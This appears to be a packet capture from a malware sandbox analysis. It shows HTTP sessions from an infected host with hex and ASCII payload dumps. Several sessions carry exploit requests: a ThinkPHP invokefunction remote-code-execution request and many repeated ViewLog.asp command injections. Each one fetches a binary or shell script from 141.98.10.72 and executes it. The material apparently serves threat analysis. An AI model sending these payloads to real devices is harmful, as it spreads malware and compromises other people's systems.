6e 74 2d 73 69 7a 65 3a 20 32 36 70 78 3b 22 3e 50 61 67 69 6e 61 20 6e 6f 6e 20 74 72 6f 76 61 74 61 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 09 09 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 22 3e 54 6f 72 6e 61 20 61 6c 6c 61 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 70 61 67 69 6e 61 20 69 6e 69 7a 69 61 6c 65 3c 2f 61 3e 20 72 69 63 61 72 69 63 61 6e 64 6f 20 74 75 74 74 6f 20 69 6c 20 63 6f 6e 74 65 6e 75 74 6f 3c 2f 73 70 61 6e 3e 0a 09 20 20 20 20 3c 2f 64 69 76 3e 0a 09 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 36 70 78 3b 22 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 09 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 22 3e 47 6f 20 62 61 63 6b 20 74 6f 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 68 6f 6d 65 20 70 61 67 65 3c 2f 61 3e 20 72 65 6c 6f 61 64 69 6e 67 20 74 68 65 20 63 6f 6e 74 65 6e 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>TeamPortal</title> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="icon" href="/favicon.ico" /> </head> <body> <div style="margin: 150px auto; width: 500px; text-align:center; font-style: normal;font-family: Arial, Helvetica, sans-serif;"> <div style="margin-bottom: 50px; padding-bottom: 50px; border-bottom: 1px solid #CCC;"><span style="font-size: 26px;">Pagina non trovata</span><br /><span style="font-size: 13px; color: #666;">Torna alla <a href="/" target="_top">pagina iniziale</a> ricaricando tutto il contenuto</span> </div> <span style="font-size: 26px;">Page not found</span><br /> <span style="font-size: 13px; color: #666;">Go back to the <a href="/" target="_top">home page</a> reloading the content</span> </div> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1092192.168.2.235521888.99.175.1880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.937931061 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:26.144218922 CET467INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:17 GMT
                                                            Server: Apache
                                                            Content-Length: 289
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 74 68 61 75 73 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at holthaus.info Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1093192.168.2.235663895.217.12.17780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.965178967 CET48INHTTP/1.1 101 Switching Protocols


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1094192.168.2.233989662.171.149.98080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:29.611710072 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:29.894357920 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:30.105007887 CET146INHTTP/1.1 307 Temporary Redirect
                                                            Location: /containers/
                                                            Date: Wed, 14 Feb 2024 08:30:30 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1095192.168.2.234200095.111.87.938080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:29.620661974 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:29.850608110 CET379INHTTP/1.0 302 Redirect
                                                            Date: Mon, 07 May 2012 01:49:19 GMT
                                                            Server: Boa/0.94.14rc21
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Location: /index.html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 09 09 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 74 6f 20 61 20 6e 65 77 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 28 6e 75 6c 6c 29 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 6c 6f 63 61 74 69 6f 6e 3c 2f 61 3e 2e 0d 0a 09 09 50 6c 65 61 73 65 20 75 70 64 61 74 65 20 79 6f 75 72 20 64 6f 63 75 6d 65 6e 74 73 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 6e 65 77 20 6c 6f 63 61 74 69 6f 6e 2e 0d 0a 09 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head></head><body>This document has moved to a new <a href="http://(null)/index.html">location</a>.Please update your documents to reflect the new location.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1096192.168.2.234120662.29.7.718080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:29.638797998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1097192.168.2.234066094.120.214.1558080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:29.640328884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1098192.168.2.235192294.123.249.1898080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:29.642076969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1099192.168.2.235166894.120.160.2198080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:29.886794090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1100192.168.2.234103262.29.54.598080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:29.888283014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1101192.168.2.234282494.123.186.1778080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:29.891540051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1102192.168.2.236015095.164.169.2098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:29.947101116 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:30.139476061 CET1260INHTTP/1.1 400 Bad Request
                                                            Server: squid/4.10
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 08:30:30 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 3543
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Vary: Accept-Language
                                                            Content-Language: en
                                                            X-Cache: MISS from localhost
                                                            X-Cache-Lookup: NONE from localhost:8080
                                                            Via: 1.1 localhost (squid/4.10)
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1103192.168.2.234507694.120.167.1608080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:30.134160042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1104192.168.2.233733031.40.225.2318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:30.137906075 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:30.389343977 CET1286INHTTP/1.0 400 Bad Request
                                                            Server: squid/3.1.23
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 08:00:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 3167
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
